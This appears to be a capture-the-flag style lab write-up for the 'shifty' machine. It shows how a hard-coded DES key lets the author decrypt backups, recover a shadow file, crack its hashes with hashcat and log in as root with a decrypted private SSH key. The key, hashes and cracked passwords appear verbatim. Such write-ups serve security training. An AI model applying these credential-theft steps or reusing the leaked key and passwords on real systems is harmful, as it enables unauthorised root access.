Decryption

While checking the filesystem, I came across an interesting directory that contains a Python script that performs a backup operation by hashing the filename and encrypting the file content with a custom DES python module.

While hashing is one-way, thus it would be near impossible to recover the filename, DES-encryption uses a symmetric key and it was hard-coded into the script; 87629ae8 This allows reversing the script leading to decrypting the content

jerry@shifty:/opt/backups$ tar -czf /tmp/data.tar.gz ./data
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ scp -i ~/.ssh/id_ed25519 jerry@$IP:/tmp/data.tar.gz ./data.tar.gz
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
data.tar.gz                             100%   18KB 230.2KB/s   00:00    
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ tar -xf data.tar.gz; rm data.tar.gz

I will first grab all the file within the /opt/backups/data directory

decrypt.py

import sys
import os
from des import des, CBC, PAD_PKCS5
 
def decrypt_file(encrypted_path):
    # Decrypt the content
    with open(encrypted_path, 'rb') as f:
        ciphertext = f.read()
    # Use the same DES key and IV as in the backup function
    k = des(b"87629ae8", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)
    plaintext = k.decrypt(ciphertext)
    print("#########################\n### Decrypted Content ###\n#########################")
    try:
        print(plaintext.decode('utf-8'))
    except UnicodeDecodeError:
        print("Unable to decode content as UTF-8. Displaying bytes:")
        print(plaintext)
 
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: {sys.argv[0]} <encrypted_file>')
        sys.exit(1)
    encrypted_file = sys.argv[1]
    decrypt_file(encrypted_file)

I created a simple python script to decrypt the input file content

shadow

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ python3 decrypt.py data/0317ce62a75684cf0fcf8452a7fe5e5e919d1b730644bf16a304a919 
#########################
### Decrypted Content ###
#########################
root:$6$jper7Hn5$SKBpBAiF8T1My6Ju4a30gVrnADwsbKUH.Z3ViJ/BWqIqVNhU.YZL0ljLfRmK7WRNGFK.LuKCPlBnIW3B/h2n9.:18408:0:99999:7:::
daemon:*:18408:0:99999:7:::
bin:*:18408:0:99999:7:::
sys:*:18408:0:99999:7:::
sync:*:18408:0:99999:7:::
games:*:18408:0:99999:7:::
man:*:18408:0:99999:7:::
lp:*:18408:0:99999:7:::
mail:*:18408:0:99999:7:::
news:*:18408:0:99999:7:::
uucp:*:18408:0:99999:7:::
proxy:*:18408:0:99999:7:::
www-data:*:18408:0:99999:7:::
backup:*:18408:0:99999:7:::
list:*:18408:0:99999:7:::
irc:*:18408:0:99999:7:::
gnats:*:18408:0:99999:7:::
nobody:*:18408:0:99999:7:::
systemd-timesync:*:18408:0:99999:7:::
systemd-network:*:18408:0:99999:7:::
systemd-resolve:*:18408:0:99999:7:::
systemd-bus-proxy:*:18408:0:99999:7:::
_apt:*:18408:0:99999:7:::
Debian-exim:!:18408:0:99999:7:::
messagebus:*:18408:0:99999:7:::
sshd:*:18408:0:99999:7:::
jerry:$6$1gpf0S3D$WXA0bEA7zI.WLwnZ26ePrZ4f.nG0tyB/miajWs8UyDBZupzto6pA7oQD2a.4yKMxEk0Uwh9RvKnnTIYCt3Hjh.:18408:0:99999:7:::
memcache:!:18415:0:99999:7:::

Decrypting the 0317ce62a75684cf0fcf8452a7fe5e5e919d1b730644bf16a304a919 file revealed what appears to be the content of shadow file

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ hashcat --show ./hashes.txt
 
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ hashcat -a 0 -m 1800 ./hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$6$1gpf0S3D$WXA0bEA7zI.WLwnZ26ePrZ4f.nG0tyB/miajWs8UyDBZupzto6pA7oQD2a.4yKMxEk0Uwh9RvKnnTIYCt3Hjh.:password
$6$jper7Hn5$SKBpBAiF8T1My6Ju4a30gVrnADwsbKUH.Z3ViJ/BWqIqVNhU.YZL0ljLfRmK7WRNGFK.LuKCPlBnIW3B/h2n9.:root
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: ./hashes.txt
Time.Started.....: Wed Mar  5 15:14:44 2025 (4 mins, 19 secs)
Time.Estimated...: Wed Mar  5 15:19:03 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     3124 H/s (8.11ms) @ Accel:256 Loops:512 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new), 2/2 (100.00%) Salts
Progress.........: 1613824/28688770 (5.63%)
Rejected.........: 0/1613824 (0.00%)
Restore.Point....: 806656/14344385 (5.62%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:4608-5000
Candidate.Engine.: Device Generator
Candidates.#1....: rosaura19 -> room126
Hardware.Mon.#1..: Util: 79%
 
Started: Wed Mar  5 15:14:42 2025
Stopped: Wed Mar  5 15:19:05 2025

Password hashes cracked

jerry@shifty:~$ su root
Password: root
su: Authentication failure

It would appear that password of the root account has changed

SSH Private Key

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ python3 decrypt.py data/31328fa57f5c504df041f7f4f45498c766c0d12c33f78f33cff66bca 
#########################
### Decrypted Content ###
#########################
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsw9sPBI6js7DDqEruZrZn6kaDLV3sttQfZdz9DOn6KKbP82u
6VXlmC28TzwrSPPhQBYH0BjSQsrU7KiYvjFbPm0XTx4vXuaE132gLeBTFyGiixTb
iZ5v76nEx2CVWNNNzMt7MDDkIfJaj0EBntVChwVOD74x6uSdQz0LznKDE320bd55
g9tvecbeAQGSEkag7o79aAbeQUBhDhYPak7jeM7p9zeXjxmh16qXELL7uCtmEkr+
GuaHzTMyuD1oJ4CtsLfb5OwrJKu+V1/ruIVs+zFye0I2qeJZLHSZRU2bxU6QYqPd
PB3jEBqfGeEWqL6IwPrZcNsxsX/z8qTG4a2oAQIDAQABAoIBAQCwZMQaFVcMcdEj
60/4wvwZ1essk+P8FSMg5f87lVuWyAEqhIQHpy/Lj1qPr9VwQ5glms5NiPYxCEFj
dd8qldKuF6e7sB+4XFyHMGGIcBFKmz7VxlFTK/pXXaXVR2c4nshotBeB7NgAPRBL
SR3Ai5PDEU3KInJoVJg7sbqcwKAxpKA79O5vEIKBs7kqsXx3c+oLYre9Lqybu/jI
Bf18qyXVB2fqyFc94rhKn7eDi1or+VopPC3h81kRAG/aFSqKJ6PtyZYZSYQ5qI1S
SgR+7z2RwWuJVb7VfxBWZCWWR0uqsJ/7Vz3A8c9AA+41LribppBCFv5fjSaefxkw
MH1pmY+VAoGBAOUMsU6zj/WHfNVxerJtdzfrDqbA1kDI3RE/Cf42LmWjTwin7cdM
7lxtZXoYkoaU6v19U4szSw9uAEROfM33TPqlw0Vj7YwPGjpsQK9UtAJgpLgebUEP
yN7OqocGe/wYMVQq6R1FgWoRJKxPCvZfiD+q9fLE7lbZk+PfqaDv25FbAoGBAMgg
+n9xnvVS+Qgwsw/HMfz1quOWC+jiMrg5u55L1SRbiylUZQDJxcSnh2pZk718eK/J
knYq54wZ/dhgTZiNp3DFHxqLASEfqS0NcZ1aJ+FoBk8fpaY/ogeaPtb9t8xfW83Y
ZnTURR4Z9JRbDXU7XWAN14FQWY6tL5SJL6pcC67TAoGAYnBwC4j0h+tw5TLeLq0J
HckyBMy/yBwLlovnOZADpL7pCqlRceRIVQTXJgBFiP2beNJSA3NKARmfl7u7u7Fb
LiXrpHjr8NPUy+MWccQPkS4D3PWGsv2bsNZVR66rvo6PNMM0aNYkZndzsXJPHc+0
+Nf62Bl27XCZNMg9WON9FB0CgYEAsaXMltqGDyDjHKkWGfhpYDG2yyVDVyuLeEsP
R3nrLsXwJvTaX7O8UU+g/f+cDMTz4J8e2rRFK/FaivsZhkSgEJN6g7ZGf1+6bdqU
Muh3pDgR+aSPB59Otk7uXyuDPvCa7oOclzJiVFEX8aVNsfXLclt3JDvt85+6L7ED
Vcc1O68CgYAT0N7/NbLIjo2StLTM0rWV//r1MAQVI5Gf4ojxqOdB4xakQ5yY8NE3
mfQ1gbw9JPJZXd5t+Gp+V7khi+a1o6wyPj6275FnZSDVjR8g6Eu/gdmX4DhrlZeI
NVj4W5FJ2JbmGWk7p2nETq2q1wNveMGZCcTNHskoqZZsk7aLq5v5Yw==
-----END RSA PRIVATE KEY-----

The 31328fa57f5c504df041f7f4f45498c766c0d12c33f78f33cff66bca file contains what appears to be a private SSH key.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ nano ./id_rsa.root
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ chmod 600 ./id_rsa.root

SSH

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/shifty/decrytion]
└─$ ssh root@$IP -i ./id_rsa.root
Linux shifty 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1+deb9u1 (2020-06-07) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan 30 11:36:58 2024
root@shifty:~# whoami
root
root@shifty:~# hostname
shifty
root@shifty:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:d3:9d brd ff:ff:ff:ff:ff:ff
    inet 192.168.219.59/24 brd 192.168.219.255 scope global ens192
       valid_lft forever preferred_lft forever

The private SSH key belongs to the root account System level compromise

InfoSec LAB

Explorer

Shifty_Privilege_Escalation

Decryption

decrypt.py

shadow

Password Cracking

SSH Private Key

SSH

Interactive Graph View

Table of Contents

Backlinks